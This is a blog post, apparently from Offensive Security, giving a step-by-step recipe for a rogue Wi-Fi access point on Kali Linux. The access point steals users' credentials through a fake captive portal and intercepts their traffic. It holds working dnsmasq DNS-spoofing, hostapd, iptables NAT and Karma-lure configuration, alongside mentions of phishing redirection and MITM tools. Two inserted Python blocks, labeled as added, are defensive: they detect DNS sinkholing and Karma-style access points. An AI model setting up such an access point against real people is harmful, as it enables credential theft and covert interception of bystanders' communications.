http://www.offensive-security.com/kali-linux/kali-linux-evil-wireless-access-point
A few days ago, we had the opportunity
to deploy a rogue access point that would steal user credentials using a
fake, captive web portal, and provide MITM’d Internet services via 3G.
We needed reliability and scalability in our environment as there would
potentially be a large amount of, erm….”participants” in this wireless
network. We were pretty happy with the result and quickly realized that
we had created a new “Kali Linux recipe”. Or in other words, we could create a custom, bootable wireless evil access point image, which could do all sorts of wondrous things.
Required Hardware
- We used a battery-powered Raspberry Pi for this project, however the instructions below will work on pretty much anything that can run Kali Linux and has 2 free USB ports – ARM and virtual environments included.
- A supported USB wireless adapter; we used an old Netgear WNA1000 we had lying around.
- A supported 3G modem; we found a TP-Link MA180 3.75G HSUPA USB Adapter in a local shop.
Simple Setup of DNS and DHCP
We ended up building our wireless access point using hostapd and dnsmasq
using a relatively simple setup. We found that this gave the most
reliable performance and was the easiest to configure. In addition,
using dnsmasq allowed us to easily control spoofed DNS queries. We start
by installing all our prerequisites:
apt-get install -y hostapd dnsmasq wireless-tools iw wvdial
Once everything is installed, we
configure dnsmasq to serve DHCP and DNS on the wireless interface and
then start the dnsmasq service.
sed -i 's#^DAEMON_CONF=.*#DAEMON_CONF=/etc/hostapd/hostapd.conf#' /etc/init.d/hostapd
cat <<EOF > /etc/dnsmasq.conf
log-facility=/var/log/dnsmasq.log
#address=/#/10.0.0.1
#address=/google.com/10.0.0.1
interface=wlan0
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
#no-resolv
log-queries
EOF
service dnsmasq start
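Because the configuration above enables log-queries and writes to /var/log/dnsmasq.log, the log itself records which answers came from a static address= directive (dnsmasq logs these as "config NAME is IP") rather than from an upstream resolver. The following is an added example, not code from the original post, that pulls those sinkholed answers out of a constructed log sample so an analyst reviewing such a box (or checking their own lab setup) can see exactly which clients were handed the gateway address for which names; the sample lines and the gateway value 10.0.0.1 are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample of /var/log/dnsmasq.log entries with log-queries on;
# not taken from the original post.
SAMPLE_LOG = """\
Jul  9 10:00:01 dnsmasq[1234]: query[A] www.google.com from 10.0.0.15
Jul  9 10:00:01 dnsmasq[1234]: config www.google.com is 10.0.0.1
Jul  9 10:00:02 dnsmasq[1234]: query[A] example.org from 10.0.0.15
Jul  9 10:00:02 dnsmasq[1234]: forwarded example.org to 8.8.8.8
Jul  9 10:00:02 dnsmasq[1234]: reply example.org is 93.184.216.34
Jul  9 10:00:05 dnsmasq[1234]: query[A] mail.example.net from 10.0.0.22
Jul  9 10:00:05 dnsmasq[1234]: config mail.example.net is 10.0.0.1
"""

# One regex covers the query/config/forwarded/reply/cached line shapes.
LINE_RE = re.compile(
    r"dnsmasq\[\d+\]: (?P<kind>query\[\w+\]|config|forwarded|reply|cached) "
    r"(?P<name>\S+) (?:from|is|to) (?P<value>\S+)"
)


def parse_dnsmasq_log(text):
    """Yield (kind, name, value); kind is 'query', 'config', 'forwarded', ..."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        kind = m.group("kind").split("[")[0]   # 'query[A]' -> 'query'
        yield kind, m.group("name"), m.group("value")


def find_static_answers(text, gateway):
    """Return {client_ip: [names]} for queries answered from an address=
    directive with the gateway's own IP, i.e. the DNS sinkhole signature."""
    client_of = {}            # last client seen asking for each name
    hits = defaultdict(list)
    for kind, name, value in parse_dnsmasq_log(text):
        if kind == "query":
            client_of[name] = value
        elif kind == "config" and value == gateway:
            hits[client_of.get(name, "?")].append(name)
    return dict(hits)
```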
Setting up the 3G Connection
This part was surprisingly simple using
the Gnome NetworkManager GUI interface. Adding a new 3G connection and
going through the automated wizard got us online in a couple of minutes.
Once connected, we saw our new ppp0 WAN interface, now providing us
with Internet access. Alternatively, this setup can be performed at the
command line using wvdial. Now that we have our WAN connection set up, let’s move on to setting up the wireless access point.
Setting up the Wireless Access Point
Setting up the access point is a
breeze using hostapd. We configure an IP for the wireless interface, and
configure iptables rules for NAT. Then we quickly configure the hostapd
service to use our wireless interface to run an access point with the
SSID “FreeWifi”. Once the service is started a wireless network called
“FreeWifi” should show up. Anyone connecting to this network will be
routed through our Kali box, out to the Internet over 3G.
ifconfig wlan0 up
ifconfig wlan0 10.0.0.1/24
iptables -t nat -F
iptables -F
iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o ppp0 -j ACCEPT
echo '1' > /proc/sys/net/ipv4/ip_forward
cat <<EOF > /etc/hostapd/hostapd.conf
interface=wlan0
driver=nl80211
ssid=FreeWifi
channel=1
# Yes, we support the Karma attack.
#enable_karma=1
EOF
service hostapd start
Bootable Kali Access Point ISO Recipe
Using live-build, we can create a custom
Kali Linux ISO image that will boot up into a “rogue AP”. Certain
elements such as the wireless and 3G interface names (wlan0, ppp0, etc.)
would be pre-configured during the live-build process. We’ve gone ahead
and set up a Kali Recipe which worked perfectly in our VMware environment, with both the wireless card and 3G modem connected to the VM at boot time.
Doing the Evil Stuff
There’s a whole bunch of evil stuff to
be done once we’re in the middle of communications. MITM tools like
responder, evilgrade and sslsplit come to mind. In our case, selectively
spoofing DNS queries and redirecting users to our own phishing site was
sufficient for our task. Lastly, we’ve added the Karma patch to our
hostapd package, which causes the AP to respond to probe requests not
just for its own SSID but for any ESSID requested. This allows the AP to
act as a lure to draw in any clients probing for known networks. Let the games begin!
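The Karma behaviour described above has a visible side effect: a single BSSID answers under many unrelated network names. The following is an added example, not code from the original post, that parses constructed `iw dev wlan0 scan` style output and flags any BSSID seen announcing several different SSIDs, which is how a wireless IDS or a manual sweep would spot such a lure; the scan text, the MAC addresses and the threshold of three names are assumptions.

```python
import re
from collections import defaultdict

# Constructed `iw dev wlan0 scan` style output (not from the original post):
# one BSSID answering probes for several unrelated network names, plus one
# ordinary AP for contrast.
SAMPLE_SCAN = """\
BSS 02:11:22:33:44:55(on wlan0)
\tfreq: 2412
\tsignal: -38.00 dBm
\tSSID: FreeWifi
BSS 02:11:22:33:44:55(on wlan0)
\tfreq: 2412
\tsignal: -39.00 dBm
\tSSID: HomeNet
BSS 02:11:22:33:44:55(on wlan0)
\tfreq: 2412
\tSSID: CoffeeShop
BSS 0c:aa:bb:cc:dd:ee(on wlan0)
\tfreq: 2437
\tSSID: CorpGuest
"""

BSS_RE = re.compile(r"^BSS ([0-9a-f]{2}(?::[0-9a-f]{2}){5})", re.I)
SSID_RE = re.compile(r"^\s+SSID: (.*)$")


def parse_iw_scan(text):
    """Map each BSSID to the set of SSIDs it was seen announcing."""
    seen = defaultdict(set)
    bssid = None
    for line in text.splitlines():
        m = BSS_RE.match(line)
        if m:
            bssid = m.group(1).lower()   # new BSS block starts here
            continue
        m = SSID_RE.match(line)
        if m and bssid:
            seen[bssid].add(m.group(1))
    return seen


def karma_suspects(text, min_ssids=3):
    """Return [(bssid, sorted ssids)] for BSSIDs answering under at least
    min_ssids distinct names; legitimate multi-SSID APs normally use a
    distinct BSSID per network, so a high count is worth investigating."""
    return [(b, sorted(s)) for b, s in sorted(parse_iw_scan(text).items())
            if len(s) >= min_ssids]
```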
Looking for more cool stuff? Kali Linux Dojo
Looking for more cool stuff to do with
Kali Linux? Want to get some mind bending hands-on experience with the
distribution? You should check out our Kali Linux Dojo!